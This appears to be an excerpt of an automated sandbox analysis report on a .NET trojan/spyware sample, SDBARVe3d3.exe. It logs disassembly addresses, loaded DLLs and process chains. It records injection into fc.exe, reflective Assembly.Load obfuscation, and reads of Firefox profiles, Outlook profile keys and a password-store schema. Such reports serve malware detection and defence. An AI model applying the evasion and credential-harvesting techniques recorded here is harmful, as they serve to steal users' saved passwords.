                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01733D402_2_01733D40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174FDC02_2_0174FDC0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A9C322_2_017A9C32
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFCF22_2_017EFCF2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFF092_2_017EFF09
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFFB12_2_017EFFB1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01731F922_2_01731F92
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01739EB02_2_01739EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324132D7_2_0324132D
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0317D34C7_2_0317D34C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324A3527_2_0324A352
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031D739A7_2_031D739A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032503E67_2_032503E6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319E3F07_2_0319E3F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032302747_2_03230274
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031952A07_2_031952A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032312ED7_2_032312ED
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AB2C07_2_031AB2C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AD2F07_2_031AD2F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031801007_2_03180100
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0322A1187_2_0322A118
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0325B16B7_2_0325B16B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0317F1727_2_0317F172
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C516C7_2_031C516C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032501AA7_2_032501AA
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319B1B07_2_0319B1B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032481CC7_2_032481CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324F0E07_2_0324F0E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032470E97_2_032470E9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031970C07_2_031970C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0323F0CC7_2_0323F0CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031B47507_2_031B4750
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031907707_2_03190770
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324F7B07_2_0324F7B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0318C7C07_2_0318C7C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032416CC7_2_032416CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AC6E07_2_031AC6E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031905357_2_03190535
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032475717_2_03247571
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0322D5B07_2_0322D5B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032505917_2_03250591
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324F43F7_2_0324F43F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032424467_2_03242446
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031814607_2_03181460
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0323E4F67_2_0323E4F6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FB767_2_0324FB76
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324AB407_2_0324AB40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AFB807_2_031AFB80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031CDBF97_2_031CDBF9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03246BD77_2_03246BD7
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03203A6C7_2_03203A6C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03247A467_2_03247A46
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FA497_2_0324FA49
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0322DAAC7_2_0322DAAC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0318EA807_2_0318EA80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031D5AA07_2_031D5AA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0323DAC67_2_0323DAC6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031999507_2_03199950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AB9507_2_031AB950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031A69627_2_031A6962
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0325A9A67_2_0325A9A6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031929A07_2_031929A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031FD8007_2_031FD800
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031928407_2_03192840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319A8407_2_0319A840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031768B87_2_031768B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031BE8F07_2_031BE8F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031938E07_2_031938E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031B0F307_2_031B0F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FF097_2_0324FF09
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031D2F287_2_031D2F28
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03204F407_2_03204F40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03191F927_2_03191F92
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FFB17_2_0324FFB1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03182FC87_2_03182FC8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324EE267_2_0324EE26
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03190E597_2_03190E59
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031A2E907_2_031A2E90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03199EB07_2_03199EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324CE937_2_0324CE93
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324EEDB7_2_0324EEDB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319AD007_2_0319AD00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03247D737_2_03247D73
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03193D407_2_03193D40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03241D5A7_2_03241D5A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031A8DBF7_2_031A8DBF
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AFDC07_2_031AFDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0318ADE07_2_0318ADE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03209C327_2_03209C32
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03190C007_2_03190C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03230CB57_2_03230CB5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FCF27_2_0324FCF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03180CF27_2_03180CF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A11C507_2_02A11C50
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A152E07_2_02A152E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A013A17_2_02A013A1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0B10B7_2_02A0B10B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1350C7_2_02A1350C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A135107_2_02A13510
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0CBA07_2_02A0CBA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A2B9707_2_02A2B970
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0AE407_2_02A0AE40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0CDC07_2_02A0CDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309038F7_2_0309038F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E2BB7_2_0309E2BB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E1537_2_0309E153
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E0387_2_0309E038
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309D5B87_2_0309D5B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E4EC7_2_0309E4EC
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 031D7E54 appears 86 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 031C5130 appears 36 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 031FEA12 appears 85 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0317B970 appears 250 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0320F290 appears 103 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 017AF290 appears 103 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 01777E54 appears 101 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 0179EA12 appears 86 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 0171B970 appears 262 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 01765130 appears 58 times
                Source: SDBARVe3d3.exe, 00000000.00000002.1696654760.0000000007BD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000000.00000000.1665128018.00000000009E8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSPJ.exeD vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000000.00000002.1692294980.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000002.00000002.2050351362.000000000115C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000002.00000002.2050668467.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe Binary or memory string: OriginalFilenameSPJ.exeD vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SDBARVe3d3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, aCrGcrkf57MYV9WXHR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: _0020.SetAccessControl
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: _0020.AddAccessRule
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, aCrGcrkf57MYV9WXHR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: _0020.SetAccessControl
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: _0020.AddAccessRule
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, aCrGcrkf57MYV9WXHR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: _0020.SetAccessControl
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/12
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SDBARVe3d3.exe.log
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\fc.exe File created: C:\Users\user\AppData\Local\Temp\0349A-n
                Source: SDBARVe3d3.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: fc.exe, 00000007.00000002.4133667940.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2289909902.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4133667940.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SDBARVe3d3.exe ReversingLabs: Detection: 65%
                Source: unknown Process created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Process created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: SDBARVe3d3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SDBARVe3d3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SDBARVe3d3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: fc.pdb source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wPGxKDFwovcH.exe, 00000006.00000000.1972969938.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4133718040.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: SPJ.pdbSHA2568 source: SDBARVe3d3.exe
                Source: Binary string: wntdll.pdbUGP source: SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SDBARVe3d3.exe, SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SPJ.pdb source: SDBARVe3d3.exe

                Data Obfuscation

                Source: SDBARVe3d3.exe, FormGame.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: SDBARVe3d3.exe, FormGame.cs, .Net Code: InitializeComponent
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.cs, .Net Code: k5LtLXIGfq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.cs, .Net Code: k5LtLXIGfq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.cs, .Net Code: k5LtLXIGfq System.Reflection.Assembly.Load(byte[])
                Source: 7.2.fc.exe.37bcd14.2.raw.unpack, FormGame.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 7.2.fc.exe.37bcd14.2.raw.unpack, FormGame.cs, .Net Code: InitializeComponent
                Source: 8.0.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.0.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs, .Net Code: InitializeComponent
                Source: 8.2.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.2.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs, .Net Code: InitializeComponent
                Source: 9.2.firefox.exe.2f9ccd14.0.raw.unpack, FormGame.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 9.2.firefox.exe.2f9ccd14.0.raw.unpack, FormGame.cs, .Net Code: InitializeComponent
                Source: SDBARVe3d3.exe, Static PE information: 0x9A3030A7 [Fri Dec 22 09:17:27 2051 UTC]
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 0_2_0516DCBA pushfd ; retf 0_2_0516DCC1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0041600F push esp; retf 2_2_00416030
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00405119 push ss; retf 2_2_0040511A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0040AA27 push cs; iretd 2_2_0040AA28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_004142D9 push esp; retf 2_2_004142DA
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00403330 push eax; ret 2_2_00403332
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0041844F push eax; iretd 2_2_00418450
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_004165B3 push 00000032h; ret 2_2_004166AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00416662 push 00000032h; ret 2_2_004166AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00404EDD push ds; iretd 2_2_00404EED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00416683 push 00000032h; ret 2_2_004166AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00404EB6 push ecx; iretd 2_2_00404EC1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0041175E pushad ; retf 2_2_0041176E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00406737 push eax; retf 2_2_0040673B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017209AD push ecx; mov dword ptr [esp], ecx 2_2_017209B6
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx 7_2_031809B6
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1C2B9 push ebx; retf 7_2_02A1C2F9
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1C2BB push ebx; retf 7_2_02A1C2F9
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A13280 push 00000032h; ret 7_2_02A1337C
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A0E2D5 pushad ; ret 7_2_02A0E2DD
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1739E pushfd ; retf 7_2_02A173A0
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1332F push 00000032h; ret 7_2_02A1337C
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A13350 push 00000032h; ret 7_2_02A1337C
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1511C push eax; iretd 7_2_02A1511D
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A076F4 push cs; iretd 7_2_02A076F5
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A0E42B pushad ; retf 7_2_02A0E43B
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A03404 push eax; retf 7_2_02A03408
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1B57B push edi; retf 7_2_02A1B59A
